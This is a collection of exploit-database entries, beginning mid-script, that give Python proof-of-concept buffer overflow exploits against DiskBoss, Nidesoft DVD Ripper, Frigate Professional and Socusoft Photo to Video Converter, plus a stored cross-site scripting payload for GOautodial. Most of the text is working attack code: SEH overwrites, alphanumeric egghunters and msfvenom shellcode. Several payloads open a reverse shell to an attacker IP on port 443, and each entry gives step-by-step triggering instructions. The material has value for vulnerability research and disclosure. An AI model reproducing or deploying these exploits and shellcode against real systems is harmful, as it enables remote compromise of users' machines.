"\x7c\x9a\x14\xca\x23\x30\xb2\x66\xab\x9e\x45\x88\x86" buf += "\x67\xd9\x77\x29\x98\xf0\xb3\x7d\xc8\x6a\x15\xfe\x83" buf += "\x6a\x9a\x2b\x03\x3a\x34\x84\xe4\xea\xf4\x74\x8d\xe0" buf += "\xfa\xab\xad\x0b\xd1\xc3\x44\xf6\xb2\x2b\x30\x5c\xc3" buf += "\xc4\x43\x9c\xc5\xaf\xcd\x7a\xaf\xdf\x9b\xd5\x58\x79" buf += "\x86\xad\xf9\x86\x1c\xc8\x3a\x0c\x93\x2d\xf4\xe5\xde" buf += "\x3d\x61\x06\x95\x1f\x24\x19\x03\x37\xaa\x88\xc8\xc7" buf += "\xa5\xb0\x46\x90\xe2\x07\x9f\x74\x1f\x31\x09\x6a\xe2" buf += "\xa7\x72\x2e\x39\x14\x7c\xaf\xcc\x20\x5a\xbf\x08\xa8" buf += "\xe6\xeb\xc4\xff\xb0\x45\xa3\xa9\x72\x3f\x7d\x05\xdd" buf += "\xd7\xf8\x65\xde\xa1\x04\xa0\xa8\x4d\xb4\x1d\xed\x72" buf += "\x79\xca\xf9\x0b\x67\x6a\x05\xc6\x23\x9a\x4c\x4a\x05" buf += "\x33\x09\x1f\x17\x5e\xaa\xca\x54\x67\x29\xfe\x24\x9c" buf += "\x31\x8b\x21\xd8\xf5\x60\x58\x71\x90\x86\xcf\x72\xb1" exploit = "A"*420 exploit += "\x74\x06\x75\x04" # 0x10015140 pop pop ret; SDL.dll exploit += "\x40\x51\x01\x10" exploit += "\x41"*(2000-428-len(buf)) exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()

# Exploit Title: DiskBoss 7.7.14 - 'Reports and Data Directory' Buffer Overflow (SEH Egghunter) # Date: 2020-07-26 # Exploit Author: MasterVlad # Vendor Homepage: https://www.diskboss.com/ # Software Link: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe # Version: 7.7.14 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 32-bit # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open diskbsg.exe and go to Tools -> DiskBoss Options # 4. Go to Advanced and paste the clipboard into the "Reports and Data Directory" field # 5. Click on Save button #!/usr/bin/python # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI buf = "" buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A" egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" exploit = "A"*4096 # 0x67031912 - pop pop ret exploit += "\x74\x06\x75\x04" exploit += "\x12\x19\x03\x67" exploit += egg exploit += "C"*(5000-4104) exploit += "T00WT00W" exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()

# Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) # Date: 2020-07-26 # Author: Felipe Winsnes # Software Link: https://nidesoft-dvd-ripper.softonic.com/ # Version: 5.2.18 # Tested on: Windows 7 (x86) # Blog: https://whitecr0wz.github.io/ # Proof of Concept: # 1.- Run the python script, it will create the file "poc.txt". # 2.- Copy the content of the new file "poc.txt" to clipboard # 3.- Open the application. # 4.- Paste the clipboard into the "License Code" parameter within registration. # 5.- Profit. import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d" # Payload size: 448 bytes buf = b"" buf += b"\x89\xe5\xda\xda\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6d\x38\x4c" buf += b"\x42\x33\x30\x73\x30\x37\x70\x55\x30\x6c\x49\x6b\x55" buf += b"\x35\x61\x49\x50\x32\x44\x6e\x6b\x42\x70\x66\x50\x6c" buf += b"\x4b\x56\x32\x74\x4c\x6c\x4b\x42\x72\x75\x44\x6c\x4b" buf += b"\x54\x32\x31\x38\x74\x4f\x58\x37\x51\x5a\x31\x36\x55" buf += b"\x61\x6b\x4f\x4c\x6c\x77\x4c\x33\x51\x53\x4c\x35\x52" buf += b"\x76\x4c\x51\x30\x4f\x31\x78\x4f\x74\x4d\x67\x71\x38" buf += b"\x47\x68\x62\x4b\x42\x46\x32\x30\x57\x6c\x4b\x71\x42" buf += b"\x62\x30\x6e\x6b\x61\x5a\x57\x4c\x6c\x4b\x70\x4c\x54" buf += b"\x51\x63\x48\x49\x73\x63\x78\x43\x31\x4e\x31\x43\x61" buf += b"\x6c\x4b\x50\x59\x31\x30\x63\x31\x59\x43\x4e\x6b\x77" buf += b"\x39\x44\x58\x79\x73\x77\x4a\x62\x69\x4c\x4b\x66\x54" buf += b"\x6c\x4b\x47\x71\x78\x56\x70\x31\x39\x6f\x4c\x6c\x6f" buf += b"\x31\x58\x4f\x34\x4d\x46\x61\x4b\x77\x46\x58\x4d\x30" buf += b"\x53\x45\x5a\x56\x45\x53\x73\x4d\x39\x68\x67\x4b\x73" buf += b"\x4d\x51\x34\x74\x35\x79\x74\x53\x68\x6e\x6b\x33\x68" buf += b"\x67\x54\x47\x71\x69\x43\x71\x76\x4e\x6b\x74\x4c\x30" buf += b"\x4b\x4c\x4b\x73\x68\x47\x6c\x67\x71\x48\x53\x4c\x4b" buf += b"\x54\x44\x4c\x4b\x36\x61\x68\x50\x6b\x39\x61\x54\x77" buf += b"\x54\x76\x44\x63\x6b\x63\x6b\x31\x71\x32\x79\x72\x7a" buf += b"\x52\x71\x39\x6f\x4b\x50\x31\x4f\x61\x4f\x73\x6a\x6e" buf += b"\x6b\x65\x42\x48\x6b\x6e\x6d\x61\x4d\x43\x5a\x45\x51" buf += b"\x4c\x4d\x6e\x65\x6f\x42\x57\x70\x67\x70\x43\x30\x30" buf += b"\x50\x45\x38\x35\x61\x6c\x4b\x72\x4f\x6f\x77\x39\x6f" buf += b"\x79\x45\x6f\x4b\x6b\x50\x65\x4d\x67\x5a\x74\x4a\x65" buf += b"\x38\x6d\x76\x4f\x65\x6d\x6d\x4f\x6d\x49\x6f\x39\x45" buf += b"\x67\x4c\x67\x76\x73\x4c\x47\x7a\x4f\x70\x4b\x4b\x69" buf += b"\x70\x32\x55\x47\x75\x6d\x6b\x30\x47\x44\x53\x63\x42" buf += b"\x62\x4f\x42\x4a\x75\x50\x43\x63\x6b\x4f\x4e\x35\x71" buf += b"\x73\x31\x71\x30\x6c\x55\x33\x54\x6e\x62\x45\x74\x38" buf += b"\x53\x55\x65\x50\x41\x41" nseh = "\xEB\x11\x41\x41" seh = struct.pack("<I", 0x6678336D) # 0x6678336d : pop ebx # pop esi # ret | asciiprint,ascii,alphanum,lowernum {PAGE_EXECUTE_WRITECOPY} [avcodec.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Nidesoft Studio\Nidesoft DVD Ripper 5\avcodec.dll) buffer = "A" * 6008 + nseh + seh + "A" * 11 + buf + "\xff" * 200 f = open ("poc.txt", "w") f.write(buffer) f.close()

# Exploit Title: Frigate Professional 3.36.0.9 - 'Pack File' Buffer Overflow (SEH Egghunter) # Date: 2020-07-24 # Exploit Author: MasterVlad # Vendor Homepage: http://www.frigate3.com/ # Software Link: http://www.frigate3.com/download/frigate3_pro.exe # Version: 3.36.0.9 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 7 32-bit # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open Frigate3.exe and go to File -> Pack # 4. Paste the clipboard into the "Archive To" field and click on Ok button #!/usr/bin/python egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c" egg += "\x25\x4A\x50\x5c\x25\x4A" egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI buf = "" buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63" buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b" buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70" buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37" buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53" buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f" buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66" buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c" buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56" buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71" buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50" buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61" buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f" buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d" buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43" buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46" buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35" buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50" buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33" buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f" buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31" buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68" buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42" buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38" buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70" buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70" buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43" buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f" buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56" buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48" buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30" buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45" buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44" buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c" buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58" buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39" buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50" buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46" buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c" buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64" buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42" buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58" buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d" buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50" buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b" buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58" buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55" buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50" buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70" buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41" exploit = "A"*4112 # 0x40012623 - pop pop ret rtl60.bpl exploit += "\x74\x06\x75\x04" exploit += "\x23\x26\x01\x40" exploit += egg exploit += "C"*(5000-4120-len(egg)) exploit += "T00WT00W" exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()

# Exploit Title: GOautodial 4.0 - Persistent Cross-Site Scripting (Authenticated) # Author: Balzabu # Discovery Date: 2020-07-23 # Vendor Homepage: https://goautodial.org/ # Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html # Tested Version: 4.0 (Last relase as of today) # Tested on OS: CentOS 7 # STEPS TO REPRODUCE: # 1 - Log in as an agent # 2 - Write a new message to user goadmin with: Subject: Help me, I can't connect to the webphone <script src=1 href=1 onerror="javascript:alert(document.cookies)"></script> Text: whatever you want # 3 - Send and wait for goadmin to read the message... :-)

# Exploit Title: Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter) # Date: 2020-07-23 # Exploit Author: MasterVlad # Vendor Homepage: http://www.dvd-photo-slideshow.com/photo-to-video-converter.html # Software Link: https://www.exploit-db.com/apps/ea1720441edd5990a9d0d1ed564a507e-photo-to-video-pro.exe # Version: 8.07 # Vulnerability Type: Local Buffer Overflow # Tested on: Windows 10 x64 # Proof of Concept: # 1. Run the python script # 2. Open exploit.txt and copy the content to clipboard # 3. Open Socusoft Photo to Video Converter Professional 8.07 and go to Video Output # 4. Paste the clipboard into the 'Output Folder' field and click on Open #!/usr/bin/python # Badchars: 22, 2a, 3a, 3c, 3e, 3f, 7c + Non-ascii # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x22\x2a\x3a\x3c\x3e\x3f\x7c" -f py -e x86/alpha_mixed BufferRegister=EDI buf = "" buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" buf += "\x4b\x4c\x49\x78\x6d\x52\x55\x50\x65\x50\x37\x70\x53" buf += "\x50\x6b\x39\x48\x65\x54\x71\x4b\x70\x45\x34\x6c\x4b" buf += "\x52\x70\x44\x70\x6e\x6b\x52\x72\x54\x4c\x6c\x4b\x42" buf += "\x72\x66\x74\x4e\x6b\x72\x52\x65\x78\x46\x6f\x6c\x77" buf += "\x52\x6a\x74\x66\x45\x61\x6b\x4f\x6e\x4c\x45\x6c\x45" buf += "\x31\x33\x4c\x55\x52\x34\x6c\x51\x30\x4f\x31\x4a\x6f" buf += "\x54\x4d\x46\x61\x39\x57\x5a\x42\x48\x72\x32\x72\x52" buf += "\x77\x6c\x4b\x30\x52\x32\x30\x4c\x4b\x72\x6a\x45\x6c" buf += "\x6e\x6b\x52\x6c\x42\x31\x42\x58\x79\x73\x57\x38\x76" buf += "\x61\x4e\x31\x32\x71\x4c\x4b\x63\x69\x31\x30\x33\x31" buf += "\x58\x53\x6e\x6b\x52\x69\x34\x58\x4b\x53\x64\x7a\x30" buf += "\x49\x4e\x6b\x36\x54\x4e\x6b\x63\x31\x69\x46\x55\x61" buf += "\x79\x6f\x4e\x4c\x4b\x71\x7a\x6f\x54\x4d\x46\x61\x78" buf += "\x47\x55\x68\x39\x70\x31\x65\x39\x66\x74\x43\x53\x4d" buf += "\x59\x68\x47\x4b\x51\x6d\x66\x44\x61\x65\x78\x64\x56" buf += "\x38\x6e\x6b\x61\x48\x37\x54\x76\x61\x6b\x63\x31\x76" buf += "\x4c\x4b\x66\x6c\x72\x6b\x4e\x6b\x71\x48\x35\x4c\x33" buf += "\x31\x68\x53\x6e\x6b\x75\x54\x4c\x4b\x56\x61\x6a\x70" buf += "\x6c\x49\x32\x64\x74\x64\x44\x64\x73\x6b\x31\x4b\x70" buf += "\x61\x53\x69\x30\x5a\x63\x61\x6b\x4f\x49\x70\x33\x6f" buf += "\x31\x4f\x31\x4a\x4c\x4b\x37\x62\x48\x6b\x4e\x6d\x63" buf += "\x6d\x31\x78\x45\x63\x44\x72\x57\x70\x57\x70\x42\x48" buf += "\x30\x77\x44\x33\x45\x62\x33\x6f\x33\x64\x30\x68\x50" buf += "\x4c\x34\x37\x44\x66\x53\x37\x79\x6f\x68\x55\x4e\x58" buf += "\x6a\x30\x63\x31\x53\x30\x33\x30\x75\x79\x68\x44\x42" buf += "\x74\x46\x30\x71\x78\x71\x39\x6d\x50\x42\x4b\x77\x70" buf += "\x79\x6f\x59\x45\x62\x70\x56\x30\x76\x30\x32\x70\x37" buf += "\x30\x56\x30\x31\x50\x66\x30\x53\x58\x78\x6a\x76\x6f" buf += "\x49\x4f\x6b\x50\x6b\x4f\x6e\x35\x6c\x57\x33\x5a\x34" buf += "\x45\x61\x78\x59\x50\x4f\x58\x39\x34\x6e\x61\x70\x68" buf += "\x75\x52\x67\x70\x63\x31\x6f\x4b\x6d\x59\x6a\x46\x61" buf += "\x7a\x56\x70\x62\x76\x73\x67\x53\x58\x6d\x49\x69\x35" buf += "\x64\x34\x43\x51\x69\x6f\x6e\x35\x6b\x35\x4b\x70\x72" buf += "\x54\x76\x6c\x39\x6f\x62\x6e\x65\x58\x64\x35\x6a\x4c" buf += "\x55\x38\x5a\x50\x4e\x55\x4c\x62\x30\x56\x4b\x4f\x4a" buf += "\x75\x63\x58\x70\x63\x50\x6d\x70\x64\x47\x70\x6b\x39" buf += "\x6b\x53\x43\x67\x51\x47\x62\x77\x45\x61\x6a\x56\x43" buf += "\x5a\x46\x72\x32\x79\x43\x66\x39\x72\x79\x6d\x61\x76" buf += "\x4b\x77\x61\x54\x76\x44\x55\x6c\x66\x61\x63\x31\x6e" buf += "\x6d\x43\x74\x76\x44\x74\x50\x4b\x76\x45\x50\x32\x64" buf += "\x71\x44\x52\x70\x66\x36\x73\x66\x30\x56\x52\x66\x31" buf += "\x46\x42\x6e\x62\x76\x51\x46\x43\x63\x73\x66\x71\x78" buf += "\x50\x79\x38\x4c\x67\x4f\x4e\x66\x6b\x4f\x69\x45\x6c" buf += "\x49\x6b\x50\x42\x6e\x63\x66\x42\x66\x59\x6f\x64\x70" buf += "\x70\x68\x36\x68\x6d\x57\x75\x4d\x51\x70\x79\x6f\x58" buf += "\x55\x6d\x6b\x5a\x50\x48\x35\x4e\x42\x76\x36\x52\x48" buf += "\x4d\x76\x4f\x65\x4d\x6d\x6f\x6d\x79\x6f\x4a\x75\x57" buf += "\x4c\x77\x76\x71\x6c\x57\x7a\x4d\x50\x69\x6b\x69\x70" buf += "\x31\x65\x65\x55\x4f\x4b\x72\x67\x67\x63\x31\x62\x72" buf += "\x4f\x53\x5a\x75\x50\x72\x73\x6b\x4f\x5a\x75\x41\x41" egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x2C\x09\x50\x5c" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50" egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50" exploit = "A"*304 exploit += "\x74\x06\x75\x04" # 0x10047a1e exploit += "\x1e\x7a\x04\x10" exploit += egg exploit += "B"*(2000-312-len(egg)) exploit += "T00WT00W" exploit += buf f = open("exploit.txt", "w") f.write(exploit) f.close()

